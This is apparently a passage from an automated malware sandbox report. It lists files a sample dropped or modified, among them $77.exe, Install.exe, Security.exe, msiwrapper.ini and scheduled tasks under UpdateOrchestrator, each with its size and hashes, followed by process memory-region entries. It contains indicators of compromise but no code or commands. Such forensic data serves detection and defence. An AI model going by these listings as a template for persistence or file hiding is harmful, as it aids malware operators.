                                                                                                                                        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                        SHA512

                                                                                                                                        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\$77.exe

                                                                                                                                        Filesize

                                                                                                                                        62KB

                                                                                                                                        MD5

                                                                                                                                        096f734cabd6056343a9484226be48a7

                                                                                                                                        SHA1

                                                                                                                                        9fb03ffaecc7c7f89f08b7e76183eb44f8e2ae3d

                                                                                                                                        SHA256

                                                                                                                                        c8db0f5e9b3188d80b87945d14674ede1436ff03f6d9aada16b3927f4b067fa6

                                                                                                                                        SHA512

                                                                                                                                        35c351c1bcc75f920570825d9631daee14a5cdfc6d6ba3707c9cb01514ed21bac9812a9b1a161e90f5a69c1f367d9b173f00ea59feff1fe829ea91b255a6a74c

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Install.exe

                                                                                                                                        Filesize

                                                                                                                                        163KB

                                                                                                                                        MD5

                                                                                                                                        75b6e5f5b44ad6476ccf8a562c37eb98

                                                                                                                                        SHA1

                                                                                                                                        5d5b8f9882f027c09744fd965a01caaa24135ca6

                                                                                                                                        SHA256

                                                                                                                                        bdd9fcfe7b2ff3b6d7dc45e83d377561732483a431bb598163ffceec7b393719

                                                                                                                                        SHA512

                                                                                                                                        81adcf4b3ecf256aa77d970a08d66e2ccaa60a798e5f3b377634685f6ae72b56607061e34911593b30e66a0b4a53c2e8e82f16c3ddc19ddf3574043e26898a64

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MW-682dddb5-14d1-47f1-8257-c0045bf994df\files.cab

                                                                                                                                        Filesize

                                                                                                                                        199KB

                                                                                                                                        MD5

                                                                                                                                        4b978ee2ea1d2ffa2dc9a87cda29ba26

                                                                                                                                        SHA1

                                                                                                                                        4cd0e95a5394dcf40c9a869825b456004337b6d3

                                                                                                                                        SHA256

                                                                                                                                        223a8475cb90d5aeca93e4246d6416b3fe5ad3467f65dcb44afb9aad95129f4a

                                                                                                                                        SHA512

                                                                                                                                        99939fbf870a1a3f738d490dc0a6867a4c047f790d142a50d564a3461a83d0c83a1ef0e09cb2f2ce51af5cea8344b4940786d3f6cd64195cc52f9de9eea6775c

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MW-682dddb5-14d1-47f1-8257-c0045bf994df\files\Security.exe

                                                                                                                                        Filesize

                                                                                                                                        199KB

                                                                                                                                        MD5

                                                                                                                                        aea6715f6bfcf986af11577a3e4128ab

                                                                                                                                        SHA1

                                                                                                                                        8c1fa6ae784c4a1ec800b7cbd848525b5f93a2a2

                                                                                                                                        SHA256

                                                                                                                                        70242d3da1b6286b438c15236458a796832bb141913ba3b18cc95e6dedaf915b

                                                                                                                                        SHA512

                                                                                                                                        50db37033d6aaa87411546ae03dee4a0da833a8e6dec134096cb58f0d22041a2c5fcd4e832769d69f3d3e0106f3641d68fa791c359b50e2826a1406df8686538

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MW-682dddb5-14d1-47f1-8257-c0045bf994df\msiwrapper.ini

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        63552952b1b7c56c148544cbf577527f

                                                                                                                                        SHA1

                                                                                                                                        511fa4a9cef26e7a5b1640334263dea8b8e143f5

                                                                                                                                        SHA256

                                                                                                                                        8d5bdff6c8698939781c6e78394b0f71f86ab151dc36b3701def050170ac6cf4

                                                                                                                                        SHA512

                                                                                                                                        32e23ed6d5f9e8226ed489a01464ac2b9f76c1b30348a16d8dabafe6f51990dacd154ef22932ee0ec16aa45a056a676d2b4433e8c40c218a1cb389f93bb89b4f

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MW-682dddb5-14d1-47f1-8257-c0045bf994df\msiwrapper.ini

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        fa8785b2b277484802a5b7b245648f3c

                                                                                                                                        SHA1

                                                                                                                                        7c06fbc191d38d99ba140e43bd9f11e52f487041

                                                                                                                                        SHA256

                                                                                                                                        66863e5e921451c3af7300e4a47b358f00b45dfbbaf834d62e659c23f234fcb6

                                                                                                                                        SHA512

                                                                                                                                        ab07ec87692c44f9db7156a0330eaaa597fc9ba9379992de071f11ac5e06f1ecd58106f07ab94bf9ab99df555df3b16ccfb6a884b17f96733709398d875f40e4

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\MW-682dddb5-14d1-47f1-8257-c0045bf994df\msiwrapper.ini

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        4104ec6eb9392c0973105aed8d545a6e

                                                                                                                                        SHA1

                                                                                                                                        0cde5721473d0250baa27a74f9740f6947d3d810

                                                                                                                                        SHA256

                                                                                                                                        6b02ba03c09a41d89e55efe3b6666c46412337901c9af57b0b6461719011258b

                                                                                                                                        SHA512

                                                                                                                                        4c9f330b145a107f74b535b7989dbb14e1801a4455c53a49e4de0cc2cc4395f29d71adcd53ca836ba94adae1e0bd3b1fcca4fcf5b1b6dd3a57ac6c6c9d47a6f1

                                                                                                                                      • C:\Windows\Installer\MSI7D8C.tmp

                                                                                                                                        Filesize

                                                                                                                                        208KB

                                                                                                                                        MD5

                                                                                                                                        0c8921bbcc37c6efd34faf44cf3b0cb5

                                                                                                                                        SHA1

                                                                                                                                        dcfa71246157edcd09eecaf9d4c5e360b24b3e49

                                                                                                                                        SHA256

                                                                                                                                        fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1

                                                                                                                                        SHA512

                                                                                                                                        ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                        SHA1

                                                                                                                                        98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                        SHA256

                                                                                                                                        ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                        SHA512

                                                                                                                                        c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        f313c5b4f95605026428425586317353

                                                                                                                                        SHA1

                                                                                                                                        06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                        SHA256

                                                                                                                                        129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                        SHA512

                                                                                                                                        b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                        SHA1

                                                                                                                                        a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                        SHA256

                                                                                                                                        98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                        SHA512

                                                                                                                                        1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                        SHA1

                                                                                                                                        63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                        SHA256

                                                                                                                                        727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                        SHA512

                                                                                                                                        f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                        SHA1

                                                                                                                                        5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                        SHA256

                                                                                                                                        55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                        SHA512

                                                                                                                                        5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                        SHA1

                                                                                                                                        9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                        SHA256

                                                                                                                                        a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                        SHA512

                                                                                                                                        c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                      • C:\Windows\Temp\__PSScriptPolicyTest_0ugth5hs.gw3.ps1

                                                                                                                                        Filesize

                                                                                                                                        60B

                                                                                                                                        MD5

                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                        SHA1

                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                        SHA256

                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                        SHA512

                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                      • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

                                                                                                                                        Filesize

                                                                                                                                        24.1MB

                                                                                                                                        MD5

                                                                                                                                        5fd703d4aaa1e914bb6478fa9f0d3806

                                                                                                                                        SHA1

                                                                                                                                        9ed1e9303addf2ffeaefc9e3549521ae6db4775b

                                                                                                                                        SHA256

                                                                                                                                        fad95e9cd6edca30c452c3a4f0168f9ec5f4393f9931a34acd72e085a8ca1880

                                                                                                                                        SHA512

                                                                                                                                        c22b113cd7f9cef17236979a1093f4b48d2411c910117416c2adf7de5ef6c7de3e0904f02767b741a08e6b8edefbd2bb086d84f188c84d09afc8537eaf130465

                                                                                                                                      • \??\Volume{2c2b4495-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{8de756ab-a358-4f7b-9b10-14b962e68136}_OnDiskSnapshotProp

                                                                                                                                        Filesize

                                                                                                                                        6KB

                                                                                                                                        MD5

                                                                                                                                        fb6391df59f7f8bda3a60015bfc9085c

                                                                                                                                        SHA1

                                                                                                                                        04f01801809d93e1a32c41bfda804dfb45c406da

                                                                                                                                        SHA256

                                                                                                                                        a35bd73fb4654b9739b21e54e84692f31fe3169006a408bc2a511f172f58a862

                                                                                                                                        SHA512

                                                                                                                                        435d78b1223a86810a16635131f1ab712d2b90c8108cedfe071276f8bd6b1d6477de97065efbd6b4076f857cf44cdf842f43082231aae9bfca854d58826cc887

                                                                                                                                      • memory/608-126-0x00000169338E0000-0x0000016933904000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        144KB

                                                                                                                                      • memory/608-127-0x0000016933910000-0x000001693393A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/608-123-0x0000016933610000-0x0000016933619000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        36KB

                                                                                                                                      • memory/608-122-0x0000016933610000-0x0000016933619000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        36KB

                                                                                                                                      • memory/608-133-0x0000016933910000-0x000001693393A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/608-135-0x0000016933910000-0x000001693393A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/608-136-0x0000016933910000-0x000001693393A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/608-124-0x0000016933610000-0x0000016933619000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        36KB

                                                                                                                                      • memory/608-128-0x0000016933910000-0x000001693393A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/608-119-0x0000016933610000-0x0000016933619000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        36KB

                                                                                                                                      • memory/608-116-0x0000016933610000-0x0000016933619000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        36KB

                                                                                                                                      • memory/608-115-0x00000169335F0000-0x00000169335F5000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        20KB

                                                                                                                                      • memory/608-134-0x0000016933910000-0x000001693393A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/668-148-0x00000211925B0000-0x00000211925DA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/668-147-0x00000211925B0000-0x00000211925DA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/668-150-0x00007FFEE52B0000-0x00007FFEE52C0000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/668-149-0x00000211925B0000-0x00000211925DA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/668-140-0x00000211925B0000-0x00000211925DA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/668-145-0x00000211925B0000-0x00000211925DA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/668-146-0x00000211925B0000-0x00000211925DA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/952-161-0x000001ED615A0000-0x000001ED615CA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/952-154-0x000001ED615A0000-0x000001ED615CA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/952-159-0x000001ED615A0000-0x000001ED615CA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/952-160-0x000001ED615A0000-0x000001ED615CA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/952-164-0x00007FFEE52B0000-0x00007FFEE52C0000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/952-162-0x000001ED615A0000-0x000001ED615CA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/952-163-0x000001ED615A0000-0x000001ED615CA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/1016-176-0x0000027EAC540000-0x0000027EAC56A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/1016-168-0x0000027EAC540000-0x0000027EAC56A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/1016-173-0x0000027EAC540000-0x0000027EAC56A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/1016-174-0x0000027EAC540000-0x0000027EAC56A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/1016-175-0x0000027EAC540000-0x0000027EAC56A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/1016-177-0x0000027EAC540000-0x0000027EAC56A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/1292-91-0x00000000000C0000-0x00000000000D6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        88KB

                                                                                                                                      • memory/1644-68-0x0000000000CC0000-0x0000000000CF8000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        224KB

                                                                                                                                      • memory/5700-113-0x00007FFF22AC0000-0x00007FFF22D89000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.8MB

                                                                                                                                      • memory/5700-114-0x00007FFF23480000-0x00007FFF2353E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        760KB

                                                                                                                                      • memory/5700-112-0x00007FFF25230000-0x00007FFF25425000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.0MB

                                                                                                                                      • memory/5700-111-0x000001EAD6750000-0x000001EAD677A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        168KB

                                                                                                                                      • memory/5700-105-0x000001EAD64B0000-0x000001EAD64D2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB